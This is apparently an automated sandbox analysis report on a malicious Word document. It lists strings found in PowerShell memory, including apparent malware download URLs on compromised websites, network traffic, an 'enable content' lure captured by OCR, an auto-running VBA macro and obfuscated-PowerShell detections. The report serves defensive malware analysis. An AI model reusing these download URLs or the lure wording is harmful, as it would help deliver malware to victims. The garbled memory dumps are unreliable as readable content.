Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/blog
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/blog/empreender-e-sonhar/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/blog/novo-normal-o-papel-do-e-commerce-para-as-novas-empresas/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/blog/sinalizacao-seu-cartao-de-visita/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/acm-2/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/acm-3/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/acm/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/aco-corten-2/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/aco-corten/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/acrilico-com-iluminacao/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/acrilico/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/design-2/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/design/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/displays-luminosos/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/letra-caixa/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/projeto-persolalizado/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/site-institucional-www-metronetwork-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/site-institucional-www-quality-esp-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/site-institucional-www-ximpressoes-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/trabalho-8-2/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/web-site-www-btenergia-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/web-site-www-cemundodosaber-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/web-site-www-weissarquitetura-com/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/portfolio/www-btenergia-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/branding-de-marca/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/comunicacao-visual/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/e-commerce/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/limpeza-de-fachadas/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/marketing-digital/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/servicos/web-design/
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/site/0H/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-conte
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/css/main.css
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/img/cover.webp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/img/favicon.webp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/js/main.js
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/ARTE_FOTO-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/ARTE_FOTO-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/COC-SITE.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/WEB-1-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/WEB-1-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/slideshow3.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/4.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/CAIXA-2-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/CAIXA-2-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/The-Stockton-Cafe-4-320x200.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/logo-site-1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/logo-site.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/04/ARQUITETURA-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/04/ARQUITETURA-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/4.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/SITE3-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/SITE4-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/logo-site-2.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/mockDrop_iMac-on-a-table-1-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/2-1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/6.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/LETRA-CAIXA.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/icone_id-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/icone_id-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/10/Screenshot_2.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/10/ld-pierre-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_MISSAO.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_VALORES.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_VIS
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/MDF.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/METRO-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/XIMPRESSOES-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/quadro-led-luminoso-cerveja-redondo-duff-beer-44cm-
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/2.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/3.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/4.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/06/fachada_02_site.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/3.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/mockDrop_iMac-on-a-table-2-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/nizan-guanaes-propmark-55-anos-450x300.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/o-que-e-e-commerce.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/10.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/11.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/ACR
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/Subway-sec-450x300.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/Subway-sec.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-includes/js/wp-embed.min.js
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://b2bcom.com.br/wp-json/
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://cairocad.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: https://cairocad.com/cgi-bin/1PBB/
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://cairocad.comp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:300
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117416892.0000000003C20000.00000004.00000001.sdmp	String found in binary or memory: https://physio-svdh.ch
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: https://physio-svdh.ch/wp-admin/kK/
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp	String found in binary or memory: https://physio-svdh.ch/wp-admin/kK/P
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.isatechnology.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmp	String found in binary or memory: https://www.isatechnology.com/training/b/
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.isatechnology.comp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/channel/UCrYEOm4ym22murrhb0WGC2A

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443

E-Banking Fraud:

Drops certificate files (DER)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K . . . . O
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K . . . . O
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Very long command line found

Source: unknown	Process created: Commandline size = 7856
Source: unknown	Process created: Commandline size = 7765
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7765	Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_000007FF00282FE9

4_2_000007FF00282FE9

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: v22Pc0qA.doc.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module Dk5att0cu_9jsb, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: v22Pc0qA.doc.doc

OLE indicator, VBA macros: true

Yara signature match

Source: 00000004.00000002.2110752047.00000000002D6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.2111601657.0000000001C34000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal96.troj.evad.winDOC@6/14@8/6

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$2Pc0qA.doc.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC985.tmp

Jump to behavior

Source: v22Pc0qA.doc.doc

OLE indicator, Word Document stream: true

Source: v22Pc0qA.doc.doc	OLE document summary: title field not present or empty
Source: v22Pc0qA.doc.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............3........................... .=.......=.....................................#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............3...h...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.......L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......X.v.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j....................................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j..... ..............................}..v............0.{.............X.v.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E........................3.j....................................}..v....P.......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................3.j....8.v.............................}..v............0.{...............v.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............b2.j....................................}..v.....L......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............b2.j..... ..............................}..v....(M......0.{...............v.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j....................................}..v....@.......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j....................................}..v....@.......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j....................................}..v....@.......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....X.......0.{..............Bv.....(.......h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[..................j....................................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.6.............}..v............0.{..............Bv.....$.......h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X ..............................}..v..... ......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....'......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X(..............................}..v.....(......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v...../......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X0..............................}..v.....0......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....7......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E..........................j....X8..............................}..v.....8......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X@..............................}..v.....@......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....G......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....XH..............................}..v.....H......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....O......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....XP..............................}..v.....P......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....W......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....XX..............................}..v.....X......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X`..............................}..v.....`......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....g......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....Xh..............................}..v.....h......0.{.............xCv.............h...............	Jump to behavior
